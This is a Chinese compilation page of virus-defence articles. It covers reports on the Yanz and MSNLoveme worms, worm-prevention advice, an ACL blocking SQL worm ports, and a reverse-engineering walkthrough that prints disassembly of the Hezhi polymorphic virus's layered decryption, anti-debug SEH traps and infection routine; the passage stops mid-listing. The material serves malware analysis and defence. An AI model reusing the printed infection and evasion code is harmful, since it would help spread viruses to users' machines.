您现在的位置：首页 > 实用文 > 其他范文

“燕子”（Worm.Yanz.b）蠕虫病毒分析报告病毒防范

时间：2022-06-18 08:29:47 其他范文收藏本文下载本文

以下是小编整理的“燕子”（Worm.Yanz.b）蠕虫病毒分析报告病毒防范，本文共12篇，仅供参考，希望能够帮助到大家。

篇1：“燕子”（Worm.Yanz.b）蠕虫病毒分析报告病毒防范

病毒名称:Worm.Yanz.b

中文名称:燕子

威胁级别:中

病毒类型:蠕虫

受影响系统:Win9x / WinNT

发现时间:11月24日

病毒简介:

该病毒通过共享、电子邮件等多种方式传播，病毒的文件名仿冒孙燕姿的的歌曲

（如：Huai_Tian_Qi Tao_Wang），诱使用户打开运行，打开后会弹出一个

“No Windows. Yes doors and holes”内容的对话框，

病毒还会尝试从网上下载一个键盘记录木马，窃取用户的信息。

技术特点:

1、在创建如下文件：

C:Yanzi.htm

%SystemRoot%Sun_YanZI.zip（为含有病毒的压缩包，包内的名称为：Sun_Yan_Zi-Shen_Qi.mp3.pif）

%System%Dong_Shi.exe （病毒自身拷贝）

%System%NvCpl.EXE（病毒自身拷贝）

%System%I_am_Sun_Yanzi.sysa（MIME编码的病毒）

%System%Huai_Tian_Q1.sys （包含有病毒的MIME的压缩包）

YanZi.vbs（生成Sun.exe）文件

2、在注册表主键：

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun

添加如下键值

“NvCpl”=%System%NvCpl.EXE

3、在所有含有SHAR的文件夹内复制自身，文件名可能如下之一：

SunYanZi.mp3.exe

Sun_YanZi-Huai_Tian_Qi.mpg.exe

Sun_YanZi-I_am_not_sad.mp3.exe

Sun_YanZi-Leave_me_alone.mp3.exe

Sun_YanZi-Mei_You_Ren_De_Fang_Xiang.avi.exe

Sun_YanZi-Shen_Qi.exe

Sun_YanZi-Tao_Wang.mpeg.exe

YanZi.Mp3.exe

YanZi_SuN-forever.mp3.exe

4、创建Stefanie Sun Yanzi互斥量。

5、在如下文件中搜索电子邮件：

.adb

.asp

.dbx

.doc

.htm

.html

.jsp

.rtf

.txt

.xml

6、过滤含有以下字符的邮件地址：

@aksam

@dostmail

@e-kolay

@erdemir

@erdemironline

@hurriyetim

@milliyet

@mynet

@ntvmsnbc

@posta

@sabah

@superonline

7、邮件来自为以下之一：

Asia_Singer

Great_Asia_Singer

Stefanie Sun Yanzi

Sun_YanZi

Sun_YanZi_Hayrani

Sun_Yan_Zi

8、邮件主题为以下之一：

Forever Sun Yanzi

Great_Asia_Singer

Hoscakal

I_hate_Spyware

SuN_YanZi_innocent

Sun-YanZi-Mp3-Archive

Sun_YanZi_Hayrani

9、邮件内容为以下之一：

I can not contact you. Because, I am far to you(Turkiye)

I want to meet Sun YanZi. I am loving Sun-YanZi's Magic. Call me YanZi. But you don't contact me(Turkiye).

I want to see Sun YanZi. Call me Sun Yan Zi ;)

My Favourite Singer is Stefanie Sun Yanzi

Please listen to me Stefanie Sun Yanzi.

You must to listen Sun Yanzi. I am enjoying to listen Sun YanZi.

10、附件名为以下之一：

Sun_YanZi

Huai_Tian_Qi

Sun_Yanzi_Mp3

Great_Asia_Singer

World_Tour_Sun_YanZi

11、附件扩展名为以下之一：

.zip

.scr

.pif

12、Sun.exe会尝试从网上（sunyanzi.*******.cn/****.exe）下载一个键盘记录器(Win32.Troj.AKL）用于记录用户键盘，

篇2：如何防范蠕虫病毒

凡能够引起计算机故障，破坏计算机数据的程序统称为计算机病毒，所以从这个意义上说，蠕虫也是一种病毒！网络蠕虫病毒，作为对互联网危害严重的一种计算机程序，其破坏力和传染性不容忽视。与传统的病毒不同，蠕虫病毒以计算机为载体，以网络为攻击对象！本文中将蠕虫病毒分为针对企业网络和个人用户2类，并从企业用户和个人用户两个方面探讨蠕虫病毒的特征和一些防范措施!

本文根据蠕虫病毒的发作机制，将其分为利用系统级别漏洞（主动传播）和利用社会工程学(欺骗传播)两种，并从用户角度中将蠕虫病毒分为针对企业网络和个人用户2类，从企业用户和个人用户两个方面探讨蠕虫病毒的特征和一些防范措施!

一、蠕虫病毒的定义

1.蠕虫病毒的定义

计算机病毒自出现之日起，就成为计算机的一个巨大威胁，而当网络迅速发展的时候，蠕虫病毒引起的危害开始显现！从广义上定义，凡能够引起计算机故障，破坏计算机数据的程序统称为计算机病毒。所以从这个意义上说，蠕虫也是一种病毒！但是蠕虫病毒和一般的病毒有着很大的区别。对于蠕虫，现在还没有一个成套的理论体系，一般认为，蠕虫是一种通过网络传播的恶性病毒，它具有病毒的一些共性，如传播性，隐蔽性，破坏性等等，同时具有自己的一些特征，如不利用文件寄生（有的只存在于内存中），对网络造成拒绝服务，以及和技术相结合等等！在产生的破坏性上，蠕虫病毒也不是普通病毒所能比拟的，网络的发展使得蠕虫可以在短短的时间内蔓延整个网络，造成网络瘫痪！

根据使用者情况可将蠕虫病毒分为2类，一种是面向企业用户和局域网而言，这种病毒利用系统漏洞，主动进行攻击，可以对整个互联网可造成瘫痪性的后果!以“红色代码”，“尼姆达”，以及最新的“sql蠕虫王”为代表。另外一种是针对个人用户的，通过网络(主要是电子邮件，恶意网页形式)迅速传播的蠕虫病毒，以爱虫病毒，求职信病毒为例.在这两类中，第一类具有很大的主动攻击性，而且爆发也有一定的突然性，但相对来说，查杀这种病毒并不是很难，

第二种病毒的传播方式比较复杂和多样，少数利用了微软的应用程序的漏洞，更多的是利用社会工程学对用户进行欺骗和诱使，这样的病毒造成的损失是非常大的，同时也是很难根除的，比如求职信病毒，在就已经被各大杀毒厂商发现，但直到底依然排在病毒危害排行榜的首位就是证明！出得在接下来的内容中，将分别分析这两种病毒的一些特征及防范措施!

2.蠕虫病毒与一般病毒的异同

蠕虫也是一种病毒，因此具有病毒的共同特征。一般的病毒是需要的寄生的，它可以通过自己指令的执行，将自己的指令代码写到其他程序的体内，而被感染的文件就被称为”宿主”，例如，windows下可执行文件的格式为pe格式(Portable Executable)，当需要感染pe文件时，在宿主程序中，建立一个新节，将病毒代码写到新节中，修改的程序入口点等，这样，宿主程序执行的时候，就可以先执行病毒程序，病毒程序运行完之后，在把控制权交给宿主原来的程序指令。可见，病毒主要是感染文件，当然也还有像DIRII这种链接型病毒，还有引导区病毒。引导区病毒他是感染磁盘的引导区，如果是软盘被感染，这张软盘用在其他机器上后，同样也会感染其他机器，所以传播方式也是用软盘等方式。

蠕虫一般不采取利用pe格式插入文件的方法，而是复制自身在互联网环境下进行传播，病毒的传染能力主要是针对计算机内的文件系统而言，而蠕虫病毒的传染目标是互联网内的所有计算机.局域网条件下的共享文件夹，电子邮件email，网络中的恶意网页，大量存在着漏洞的服务器等都成为蠕虫传播的良好途径。网络的发展也使得蠕虫病毒可以在几个小时内蔓延全球!而且蠕虫的主动攻击性和突然爆发性将使得人们手足无策!

普通病毒蠕虫病毒存在形式寄存文件独立程序传染机制宿主程序运行主动攻击传染目标本地文件网络计算机

可以预见，未来能够给网络带来重大灾难的主要必定是网络蠕虫!

篇3：如何防范SQL蠕虫病毒

SQL蠕虫一直是让企业网络管理人员很头疼的问题，许多时候如果使用工具针对端口1433、1434抓包会发现，很多用户电脑上面并没有安装SQL服务器，但是仍能监测有蠕虫通过1433端口向外面大量发包，一般来说微软的桌面数据库MSDE也有可能感染该蠕虫。

SQL蠕虫首次露面以来，就一直在扫描成千上万台与Internet相连的电脑系统的1433端口，企图寻找运行微软SQL且没有在系统管理员账号上设置适当密码的系统。还存在另外一种病毒，即使并没有安装数据库的PC也会感染。这个时候客户端PC如果没有办法解决的话，就只能从网络层进行防护了。

一般来说UDP端口1434都是用来做侦听的，可以在网络设备上过滤掉UDP1434；而TCP端口1433是SQL服务器正常通信需要的端口，并不能全网过滤掉。

但是一般来说，跨网段的数据库很少，这样，我们可以开放有数据库的网段的1433端口，然后再过滤全网的1433，这样减少了故障处理点，也达到了目的，

看看下面的ACL，核心三层交换机S8016针对1433、1434所做的ACL，其他设备类似。

注：全网封UDP 1434，开放10.145.7.0网段的TCP端口1433。

rule-map intervlan rule72 tcp any any eq 1433

rule-map intervlan rule73 tcp any any eq 1434

rule-map intervlan rule69 tcp any 10.145.7.0 0.0.0.255 eq 1433

eacl acl-jxic rule69 permit priority 34083

eacl acl-jxic rule72 deny priority 34088

eacl acl-jxic rule73 deny priority 34090

之后用抓包工具检查可以发现SQL蠕虫没有了，设备也没有告警，大功告成！

篇4：蠕虫病毒lib32wati.exe系列分析病毒防范

通过分析发现，该病毒为传播性很强的蠕虫，分析时，发作的为lib32wati.exe这个程序，通过扫描135、1433、8080端口的弱口令进行传播，

同时，该蠕虫是使用.NET编写，具有较强的躲避杀软查杀能力。不联网不发作，一旦连接互联网，即开始向互联网发送大量数据（一分钟左右抓包70M），造成网络设备CPU利用率提高，网络延迟等现象。

篇5：蠕虫病毒lib32wati.exe系列分析病毒防范

4月16日发现此病毒后，将病毒提交给趋势，4月19日再查看数据，显示已经可以查杀，但瑞星等其他杀毒软件还是木有反应。

篇6：病毒分析报告病毒防范

以前做病毒分析时整理的一个比较简单的报告模板，仅参考：

# by:∮明天去要饭

# yaofan.me

+——————————————————–+

+ 样本个数: x 个 +

+ 提交日期: 200X-XX-XX +

+ 样本提交: XXX +

+——————————————————–+

1. 目录

+ 文件夹

├ xxx1.exe <—– xxx1的说明

├ xxx2.exe <—– xxx2的说明

2. 详细内容

+——————————————————–+

+ 样本编号: 2.1 +

+ 样本名称: xxx.exe +

+ 样本大小: xxx 字节 +

+ 样本MD5 : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx +

+——————————————————–+

1. 进程

创建(隐藏)进程:

%SYSTEMROOT%system32xxx.exe user

2. 文件行为

释放如下文件:

%SYSTEMROOT%system32xxxadd1.exe

%SYSTEMROOT%system32xxxadd2.exe

删除如下文件:

%SYSTEMROOT%system32xxxdel1.exe

%SYSTEMROOT%system32xxxdel2.exe

感染如下文件:

%SYSTEMROOT%system32xxxappend1.exe

%SYSTEMROOT%system32xxxappend2.exe

3. 网络行为

3.1 解析域名

www.xxx.com —–> xxx.xxx.xxx.xxx

3.2 数据交互

访问如下链接:

www.xxx.com/xxx.exe

4. 启动方式

4.1 系统服务

显示名称: xxx

服务名: xxx

服务描述: xxx

文件路径: %SYSTEMROOT%system32xxx.exe

启动类型: 自动

4.2 注册表

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun

下添加如下项/键:

项/键名: xxx

路径: %SYSTEMROOT%system32xxxadd1.exe

5. 自我保护

5.1 注入到xxx进程

5.2 自动关闭xxx杀毒软件或防火墙

6. 总结

该样本是/不是恶意软件.

篇7：MSN爱你(Worm.MSNLoveme) 蠕虫病毒分析报告病毒防范

病毒名称：Worm.MSNLoveme

病毒别名：W32.Bropia[诺顿]、WORM_BROPIA.A[趋势]、Worm.MSN.Bropia.a[瑞星]

处理时间：-01-20

中文名称：MSN爱你

病毒类型：未知

威胁级别：

影响系统：

病毒行为:

该病毒通过MSN通讯工具进行传播，用户运行后在会释放一个Rbot后门程序，

从而控制感染机器。该病毒还会禁止用户使用资源管理器、CMD.EXE命令行程序，

及鼠标右键。并且会将感染机器的音量调到零，使用户无法听到声音。

1、将自身复制系统根目录下，并使用以下文件名之一：

Drunk_lol.pif

Webcam_004.pif

sexy_bedroom.pif

naked_party.pif

love_me.pif

2、查找系统目录中是否存在以下文件

adaware.exe

VB6.EXE

lexplore.exe

Win32.exe

如果不存在，则释放一个后门：

oms.exe(Win32.Hack.Rbot，大小为119296)

3、蠕虫会运行这个后门，

后门运行后会向注册表中添加如下键值：

HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun

“lexplore” = “lexplore.exe”

HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServices

“lexplore” = “lexplore.exe”

HKEY_CURRENT_USERSoftwareMicrosoftOLE

“lexplore” = “lexplore.exe”

以在启动计算机时，自动运行后门。

4、后门会将自身复制到

%System%lexplore.exe

并删除源文件。

5、禁止使用任务管理器、CMD命令，和鼠标右键。并会将感染机器的音量调到零，

使用户无法听到声音。

6、在用户打开MSN聊天对话框时，会自动向对方发送病毒自身。

发送的文件名可能为以下之一：

Drunk_lol.pif

Webcam_004.pif

sexy_bedroom.pif

naked_party.pif

love_me.pif

7、由于病毒是没有考虑中文操作系统，所以在中文操作系统中会弹出对话框，

但不会自动向外发送

篇8：hezhi病毒分析报告病毒防范

作者：haiwei/CVC.GB

Hezhi病毒是去年分析一个病毒,下面是分析报告,由于xxx原因杀毒程序不能公布(其实分析报告应该写得比较清楚了,哈)

写杀变形病毒的程序, 首先是要解决怎么查这个病毒(把病毒的变形引擎分析透彻一点,它怎么变你就怎么查),然后才是杀(好像是废话:))

hezhi病毒分析报告

haiwei/CVC.GB

关键字:

变形病毒感染AntiDebug

分析工具:

OD(动态)IDA(静态)

分析目标:

1.样本MD5值:a7be1177766cec09d7e914ea7985c723

2.病毒名称:Win32.Hezhi

难度:中

病毒简介:

1.这是一个基于poly技术的病毒,病毒代码经过五层加密,且key为动态的.

2.感染在宿主程序的节空隙,如果没有足够的空隙,则增加最后一节的节大小.

3.加密原宿主代码.

4.病毒代码中有多处SEH陷井来反动态调试

病毒执行流程:

1.第一次解密

004087D3 0F 84 87 EF FF FF jz near ptr loc_40775F+1

.text:004087D9 50 push eax

.text:004087DA E8 00 00 00 00 call $+5

.text:004087DF 58 pop eax

.text:004087E0 58 pop eax

.text:004087E1 BE 00 00 09 02 mov esi, 2090000h 关键

.text:004087E6 50 push eax

.text:004087E7 13 C3 adc eax, ebx

.text:004087E9 1B C3 sbb eax, ebx

.text:004087EB 58 pop eax

.text:004087EC B8 0C 03 00 00 mov eax, 30Ch

.text:004087F1 57 push edi

.text:004087F2 F7 D7 not edi

.text:004087F4 0F 03 F8 lsl edi, eax

.text:004087F7 5F pop edi

.text:004087F8 81 C0 3A 2E 00 00 add eax, 2E3Ah

.text:004087FE 57 push edi

.text:004087FF F7 D7 not edi

.text:00408801 0F 03 F8 lsl edi, eax

.text:00408804 5F pop edi

.text:00408805 C1 C6 1D rol esi, 1Dh 经过这条指令Esi为待解密代码的

起始地址

.text:00408808 51 push ecx

.text:00408809 81 C1 19 39 D0 DB add ecx, 0DBD03919h

.text:0040880F 59 pop ecx

.text:00408810

.text:00408810 loc_408810: ; CODE XREF: start+D0j

.text:00408810 81 34 30 DA 0C 03 D2 xor dword ptr [eax+esi], 0D2030CDAh Key

.text:00408817 F5 cmc

.text:00408818 F5 cmc

.text:00408819 90 nop

.text:0040881A 90 nop

.text:0040881B 48 dec eax

.text:0040881C 50 push eax

.text:0040881D E8 00 00 00 00 call $+5

.text:00408822 58 pop eax

.text:00408823 58 pop eax

.text:00408824 7D EA jge short loc_408810 循环

.text:00408826 57 push edi

.text:00408827 F7 D7 not edi

.text:00408829 0F 03 F8 lsl edi, eax

.text:0040882C 5F pop edi

.text:0040882D FF E6 jmp esi 跳到已解密代码执行

下面为小弟写的IDC解密脚本:

auto RegEsi;

auto Key;

auto RegEax;

RegEsi=0x41;

Key=0xd2030cda;

RegEax=0x3146;

for (;RegEax>=0;RegEax--)

{

Data=Dword(RegEax+RegEsi)^Key;

PatchDword(RegEax+RegEsi,Data);

}

在OD里可以把代码直接拉到JMP XX处 F4(XX可变),在这个例子样本中为JMP Esi

2.第二次解密

JMP Esi来到412000,该处代码如下

0041 50 PUSH EAX

0041 E8 00000000 CALL CLSPACK1.0041

00412008 58 POP EAX

0041 83C0 1A ADD EAX,1A

0041200C 50 PUSH EAX ; CLSPACK1.00412022

0041200D 64:67:FF36 0000 PUSH DWORD PTR FS:[0] 这里很明显是一个SEH陷井

0041 64:67:8926 0000 MOV DWORD PTR FS:[0],ESP

0041 B8 FFFFFFFF MOV EAX,-1

0041201E FFE0 JMP EAX 故意产生异常

0041 FFE0 JMP EAX

00412022 64:67:A1 0000 MOV EAX,DWORD PTR FS:[0] 在这个位置F2下断点,F9,出现异常

出现异常后按shift+F9到412022断点处停下

00412027 8B20 MOV ESP,DWORD PTR DS:[EAX]

00412029 64:67:8F06 0000 POP DWORD PTR FS:[0]

0041202F 58 POP EAX 这几条指令在恢复SEH

00412030 58 POP EAX

00412031 60 PUSHAD

00412032 E8 00000000 CALL CLSPACK1.00412037

00412037 58 POP EAX

00412038 BE 82104000 MOV ESI,CLSPACK1.00401082

0041203D BB 37104000 MOV EBX,CLSPACK1.00401037

00412042 2BF3 SUB ESI,EBX

00412044 03F0 ADD ESI,EAX Esi为解密起始地址

00412046 BB C4300000 MOV EBX,30C4 解密长度

0041204B 81341E 30C87B80 XOR DWORD PTR DS:[ESI+EBX],807BC830 Key

00412052 9C PUSHFD

省略若干垃圾指令

0041207D 9D POPFD

0041207E 4B DEC EBX

0041207F ^7D CA JGE SHORT CLSPACK1.0041204B 循环

00412081 61 POPAD 在OD中把光标停在这F4

下面是第二次解密IDC脚本:

auto RegEsi;

auto Key;

auto RegEax;

auto Data;

RegEsi=0x412082;

Key=0x807bc830;

RegEax=0x30c4;

for (;RegEax>=0;RegEax--)

{

Data=Dword(RegEax+RegEsi)^Key;

PatchDword(RegEax+RegEsi,Data);

}

3.第三次解密

00412089 BE CC104000 MOV ESI,<&KERNEL32.RtlUnwind>

0041208E BB 88104000 MOV EBX,<&KERNEL32.ExitProcess>

00412093 2BF3 SUB ESI,EBX

00412095 03F0 ADD ESI,EAX 解密起始地址

00412097 B9 1F0C0000 MOV ECX,0C1F 长度

0041209C 8B06 MOV EAX,DWORD PTR DS:[ESI]

0041209E F7D0 NOT EAX 解密

004120A0 8906 MOV DWORD PTR DS:[ESI],EAX

004120A2 83C6 04 ADD ESI,4

省略若干垃圾代码

004120C9 ^E2 D1 LOOPD SHORT CLSPACK1.0041209C

004120CB 61 POPAD 光标停在这,F4

下面是第三次解密的IDC脚本:

auto RegEsi;

auto RegEax;

auto i;

auto Data;

RegEsi=0x4120cc;

RegEax=0xc1f;

for (i=0;i

{

Data=~Dword(i+RegEsi);

PatchDword(i+RegEsi,Data);

}

4.第四解密

004120D8 64:67:FF36 0000 PUSH DWORD PTR FS:[0]

004120DE 64:67:8926 0000 MOV DWORD PTR FS:[0],ESP 又是一个SEH陷井

004120E4 B0 88 MOV AL,88

004120E6 02C0 ADD AL,AL

004120E8 CE INTO 产生异常

004120E9 FFE0 JMP EAX

004120EB 64:67:A1 0000 MOV EAX,DWORD PTR FS:[0]

004120F0 8B20 MOV ESP,DWORD PTR DS:[EAX]

004120F2 64:67:8F06 0000 POP DWORD PTR FS:[0]

004120F8 58 POP EAX

004120F9 58 POP EAX

004120FA E8 00000000 CALL CLSPACK1.004120FF

004120FF 58 POP EAX

00412100 BE 1F114000 MOV ESI,CLSPACK1.0040111F

00412105 BB FF104000 MOV EBX,CLSPACK1.004010FF

0041210A 2BF3 SUB ESI,EBX

0041210C 03F0 ADD ESI,EAX 解密起始地址

0041210E B9 0A0C0000 MOV ECX,0C0A 长度

00412113 8106 B2C430E1 ADD DWORD PTR DS:[ESI],E130C4B2 Key

00412119 83C6 04 ADD ESI,4

0041211C ^E2 F5 LOOPD SHORT CLSPACK1.00412113

0041211E 61 POPAD 这里F2下断点,F9,Shift+F9 停在这

下面是第四次解密的IDC脚本:

auto RegEsi;

auto Key;

auto RegEax;

auto i;

auto Data;

RegEsi=0x41211f;

Key=0xe130c4b2;

RegEax=0xc0a;

for (i=0;i

{

Data=Dword(i+RegEsi)+Key;

PatchDword(i+RegEsi,Data);

}

5.第五次解密

00412126 58 POP EAX

00412127 83C0 1B ADD EAX,1B

0041212A 50 PUSH EAX

0041212B 64:67:FF36 0000 PUSH DWORD PTR FS:[0] SEH陷井

00412131 64:67:8926 0000 MOV DWORD PTR FS:[0],ESP

00412137 B8 FFFFFFFF MOV EAX,-1

0041213C C600 CC MOV BYTE PTR DS:[EAX],0CC 产生异常

0041213F FFE0 JMP EAX

00412141 64:67:A1 0000 MOV EAX,DWORD PTR FS:[0]

00412146 8B20 MOV ESP,DWORD PTR DS:[EAX]

00412148 64:67:8F06 0000 POP DWORD PTR FS:[0] 恢复SEH

0041214E 58 POP EAX

0041214F 58 POP EAX

00412150 E8 00000000 CALL CLSPACK1.00412155

00412155 58 POP EAX

00412156 BE 76114000 MOV ESI,CLSPACK1.00401176

0041215B BB 55114000 MOV EBX,CLSPACK1.00401155

00412160 2BF3 SUB ESI,EBX

00412162 03F0 ADD ESI,EAX 解密起始地址

00412164 B9 F50B0000 MOV ECX,0BF5 长度

00412169 8B06 MOV EAX,DWORD PTR DS:[ESI]

0041216B C1C0 10 ROL EAX,10 解密

0041216E 8906 MOV DWORD PTR DS:[ESI],EAX

00412170 83C6 04 ADD ESI,4

00412173 ^E2 F4 LOOPD SHORT CLSPACK1.00412169

00412175 61 POPAD 这里F2下断点,F9,Shift+F9 停在这

下面是第五次解密的IDC脚本:

auto RegEsi;

auto RegEax;

auto i;

auto Data,Temp1,Temp2;

RegEsi=0x412176;

RegEax=0xbf5;

for (i=0;i

{

Temp1=Dword(i+RegEsi);

Temp1=Temp1<<0x10;

Temp1=Temp1&0xffff0000;

Temp2=Dword(i+RegEsi);

Temp2=Temp2>>0x10;

Temp2=Temp2&0xffff;

Data=Temp1|Temp2;

PatchDword(i+RegEsi,Data);

}

6.在当前进程堆中分配8000H字节空间,并把病毒代码复制过去,并跳到堆中执行

004122B4 50 PUSH EAX

004122B5 52 PUSH EDX

004122B6 68 00800000 PUSH 8000

004122BB 6A 09 PUSH 9

004122BD 53 PUSH EBX

004122BE FFD1 CALL ECX RtlAllocateHeap

在进程堆中分配8000H字节空间

004122C0 8BC8 MOV ECX,EAX

004122C2 0BC0 OR EAX,EAX

004122C4 5A POP EDX

004122C5 58 POP EAX

004122C6 0F84 EA2D0000 JE CLSPACK1.004150B6

004122CC 50 PUSH EAX

004122CD 51 PUSH ECX

004122CE 51 PUSH ECX

004122CF 6A 09 PUSH 9

004122D1 53 PUSH EBX

004122D2 FFD2 CALL EDX

004122D4 3D 00800000 CMP EAX,8000

004122D9 0F85 D72D0000 JNZ CLSPACK1.004150B6

004122DF 59 POP ECX

004122E0 58 POP EAX

004122E1 57 PUSH EDI

004122E2 50 PUSH EAX

004122E3 8BF9 MOV EDI,ECX

004122E5 57 PUSH EDI

004122E6 B8 FC124000 MOV EAX,CLSPACK1.004012FC ; ASCII “runtime error ”

004122EB 2D 00104000 SUB EAX,<&ADVAPI32.RegSetValueExA>

004122F0 03C7 ADD EAX,EDI

004122F2 B9 4A310000 MOV ECX,314A 需复制代码的长度

004122F7 FC CLD

004122F8 F3:A4 REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI] 复制

004122FA FFE0 JMP EAX 跳到堆中执行

7.判断当前系统中是否有一个名为“DELPHI”的事件,如果存在则转12 否则转8

则解密原宿主程序代码.

001364D0 68 04010000 PUSH 104

001364D5 8D87 54270000 LEA EAX,DWORD PTR DS:[EDI+2754]

001364DB 50 PUSH EAX

001364DC 6A 00 PUSH 0

001364DE FF97 912A0000 CALL DWORD PTR DS:[EDI+2A91]

001364E4 8D87 D8290000 LEA EAX,DWORD PTR DS:[EDI+29D8]

001364EA 50 PUSH EAX

001364EB 6A 01 PUSH 1

001364ED 68 03001F00 PUSH 1F0003

001364F2 FF97 952A0000 CALL DWORD PTR DS:[EDI+2A95] OpenEvent

001364F8 8987 5C290000 MOV DWORD PTR DS:[EDI+295C],EAX

001364FE 83F8 00 CMP EAX,0

00136501 74 0C JE SHORT 0013650F 如果当前没有DELPHI事件则跳

这个跳转非常关键

它决定是走病毒流程还是原宿主程序的流程

00136503 50 PUSH EAX

00136504 FF97 792A0000 CALL DWORD PTR DS:[EDI+2A79]

0013650A E9 AF2B0000 JMP 001390BE

0013650F 8D87 D8290000 LEA EAX,DWORD PTR DS:[EDI+29D8]

00136515 50 PUSH EAX

00136516 6A 01 PUSH 1

00136518 6A 00 PUSH 0

0013651A 6A 00 PUSH 0

0013651C FF97 992A0000 CALL DWORD PTR DS:[EDI+2A99] CreateEvent 创建一个名为“DELPHI”的事件

00136522 8987 5C290000 MOV DWORD PTR DS:[EDI+295C],EAX

00136528 57 PUSH EDI

00136529 8D87 70290000 LEA EAX,DWORD PTR DS:[EDI+2970]

0013652F 50 PUSH EAX

00136530 FF97 ED2A0000 CALL DWORD PTR DS:[EDI+2AED]

00136536 5F POP EDI

00136537 8D87 60290000 LEA EAX,DWORD PTR DS:[EDI+2960]

0013653D 50 PUSH EAX

0013653E 8D87 70290000 LEA EAX,DWORD PTR DS:[EDI+2970]

00136544 50 PUSH EAX

00136545 6A 00 PUSH 0

00136547 6A 00 PUSH 0

00136549 6A 20 PUSH 20

0013654B 6A 00 PUSH 0

0013654D 6A 00 PUSH 0

0013654F 6A 00 PUSH 0

00136551 FF97 CD2A0000 CALL DWORD PTR DS:[EDI+2ACD] GetCommandLine

00136557 50 PUSH EAX

00136558 8D87 54270000 LEA EAX,DWORD PTR DS:[EDI+2754]

0013655E 50 PUSH EAX

0013655F FF97 852A0000 CALL DWORD PTR DS:[EDI+2A85] CreateProcess 自身全路径名

00136565 E8 00000000 CALL 0013656A

0013656A 58 POP EAX

0013656B 60 PUSHAD

0013656C 8D88 32000000 LEA ECX,DWORD PTR DS:[EAX+32] 这是一个变相的SEH安装

00136572 51 PUSH ECX

00136573 66:8CDA MOV DX,DS

00136576 0FA0 PUSH FS

00136578 1F POP DS

00136579 BB 00000000 MOV EBX,0

0013657E FF33 PUSH DWORD PTR DS:[EBX]

00136580 8BEC MOV EBP,ESP

00136582 892B MOV DWORD PTR DS:[EBX],EBP

00136584 66:8EDA MOV DS,DX

00136587 57 PUSH EDI

00136588 FF97 E52A0000 CALL DWORD PTR DS:[EDI+2AE5]

0013658E 5F POP EDI

0013658F 57 PUSH EDI

00136590 6A 01 PUSH 1

00136592 50 PUSH EAX

00136593 FF97 E92A0000 CALL DWORD PTR DS:[EDI+2AE9] 这里会产生异常

00136599 5F POP EDI

0013659A EB 0F JMP SHORT 001365AB

0013659C 33DB XOR EBX,EBX 这里F2下断点,F9,shift+F9

0013659E 66:8CDA MOV DX,DS

001365A1 0FA0 PUSH FS

001365A3 1F POP DS

001365A4 8B03 MOV EAX,DWORD PTR DS:[EBX]

001365A6 66:8EDA MOV DS,DX

001365A9 8B20 MOV ESP,DWORD PTR DS:[EAX]

001365AB 33DB XOR EBX,EBX

001365AD 66:8CDA MOV DX,DS

8.枚举局域网共享资源,并感染之

9.查找C-Z的固定磁盘,

a.其中包含:RUNDLL32RUNONCERAVLSASSSERVICESWINLOGONSPOOLSV

MSTASKRPCSSAVCONSOL字符串的文件不感染.

b.小于8K的文件不感染.

c.系统目录下的文件不感染.

10当找到一个EXE文件时,首先判断是否是合法的PE文件,然生判断是否是已经感染文件

(以PE文件结构中的TimeDateStamp+1处的两个字节是否等于C354H来判断),如果

等于则继续下一个文件.否则转11

11.具体的感染过程如下:(由于是在最后一次解密后DUMP出来的,所以地址跟OD中的不一样

但指令和代码功能是一样的)

另:加密病毒代码和原宿主程序代码的Key由原宿主程序TimeDateStamp算得

00412A60 66:837E 5C 02 CMP WORD PTR DS:[ESI+5C],2 WINDOWS系统

00412A65 0F85 7F040000 JNZ CLSPACK.00412EEA

00412A6B 8B46 08 MOV EAX,DWORD PTR DS:[ESI+8] TimeDateStamp

00412A6E 83F8 00 CMP EAX,0

00412A71 75 21 JNZ SHORT CLSPACK.00412A94 在TimeDataStamp不为0的情况下用它用密钥,否则用E4C3542D为密钥

00412A73 B8 2D54C3E4 MOV EAX,E4C3542D 密钥呀 E4C3542D

00412A78 C787 7F100000 CA>MOV DWORD PTR DS:[EDI+107F],2ACA

00412A82 C787 85100000 7C>MOV DWORD PTR DS:[EDI+1085],67C

00412A8C 8946 08 MOV DWORD PTR DS:[ESI+8],EAX

00412A8F E9 C3000000 JMP CLSPACK.00412B57

00412A94 8987 AA300000 MOV DWORD PTR DS:[EDI+30AA],EAX 下面这段关键呀

00412A9A 50 PUSH EAX

00412A9B 53 PUSH EBX

00412A9C 35 DF6A45D3 XOR EAX,D3456ADF D3456ADF

00412AA1 8987 4A100000 MOV DWORD PTR DS:[EDI+104A],EAX

00412AA7 BB FFFAFFFF MOV EBX,-501

00412AAC 2BD8 SUB EBX,EAX

00412AAE 899F 50100000 MOV DWORD PTR DS:[EDI+1050],EBX

00412AB4 5B POP EBX

00412AB5 58 POP EAX

00412AB6 53 PUSH EBX

00412AB7 51 PUSH ECX

00412AB8 E8 FB060000 CALL CLSPACK.004131B8 (TimeDateStamp*0x7FFFFFFF+1)%-5=EAX

其中TimeDataStamp为EAX

00412ABD 8BD8 MOV EBX,EAX

00412ABF C1EB 08 SHR EBX,8

00412AC2 50 PUSH EAX

00412AC3 53 PUSH EBX

00412AC4 51 PUSH ECX

00412AC5 52 PUSH EDX

00412AC6 8BC3 MOV EAX,EBX

00412AC8 8BCB MOV ECX,EBX

00412ACA 25 FF000000 AND EAX,0FF

00412ACF 50 PUSH EAX 这段代码应该是变形引擎的随机数选择段

00412AD0 C1E8 04 SHR EAX,4

00412AD3 24 07 AND AL,7

00412AD5 3C 05 CMP AL,5

00412AD7 76 02 JBE SHORT CLSPACK.00412ADB

00412AD9 2C 02 SUB AL,2

00412ADB 8AD8 MOV BL,AL

00412ADD 58 POP EAX

00412ADE 24 07 AND AL,7

00412AE0 3C 05 CMP AL,5

00412AE2 76 02 JBE SHORT CLSPACK.00412AE6

00412AE4 2C 04 SUB AL,4

00412AE6 38D8 CMP AL,BL

00412AE8 75 34 JNZ SHORT CLSPACK.00412B1E

00412AEA 8BD9 MOV EBX,ECX

00412AEC C1EB 08 SHR EBX,8

00412AEF 8BC3 MOV EAX,EBX

00412AF1 25 FF000000 AND EAX,0FF

00412AF6 50 PUSH EAX

